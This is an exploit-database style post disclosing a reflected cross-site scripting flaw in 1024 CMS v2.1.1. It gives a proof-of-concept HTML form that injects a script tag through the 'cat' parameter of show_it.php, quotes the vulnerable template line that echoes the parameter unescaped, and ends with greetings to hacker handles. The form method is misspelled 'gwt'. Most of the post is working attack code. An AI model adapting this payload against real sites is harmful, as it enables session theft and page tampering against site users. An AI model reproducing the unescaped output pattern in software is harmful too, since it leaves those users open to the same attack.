*=============================================================| | Exploit Title: 1024 CMS v2.1.1 Cross Site Scripting | | Exploit Author: Ashiyane Digital Security Team | | Vendor Homepage: http://1024-cms.soft112.com/ | | Download Link :https://sourceforge.net/projects/cms-cvi/files/latest/download?source=typ_redirect | | Version : v2.1.1 | | Tested on: Kali Linux | | Date: 2 /7 / 2017 *=============================================================| | Exploit Code: | |<HTML> |<HEAD><TITLE>1024 CMS v2.1.1 Cross Site Scripting</TITLE></HEAD> |<BODY> |<form action="http://127.0.0.1/10/v2.1.1/1024/library/hoteditor/show_it.php" method="gwt"> | <input type="hidden" name="cat" value="Mrsly'"/><ScRiPt>alert('M.R.S.L.Y')</ScRiPt>"/> | <input type="hidden" name="first" value="MRSLY"/> | <input type="hidden" name="page" value="0"/> | <input type="hidden" name="step" value="0"/> |</form> |</BODY> |</HTML> *=======================| |Vulnerable code : | |<table border="0" cellpadding="3" cellspacing="3" style="border-collapse: collapse" width="360" > | <tr> | <td width="68%"><font face=verdana size=1>$display_home_more / $cat2 <font color=red>($total_pic)</font></font></td> | <td width="32%" align="right">$drop_down</td> | </tr> |</table> | *=============================================================| | Special Thanks To : Behrooz_Ice، Virangar ,H_SQLI.EMpiRe ، Ehsan Cod3r ، | Und3rgr0und ، Amir.ght ، xenotix، modiret، V For Vendetta ، Alireza ، micle | r4ouf ، Net Hacker ، Spoofer ، alcol ، 1TED ، H4554N، shahroukh، Saeid_9n ، | F.SQLi ، Muts ، HackFans، B14CK SPID3R ، MALWaRE43 ، moh3nra021 | And All Of My Friends ... | The Last One : My Self, M.R.S.L.Y *=============================================================|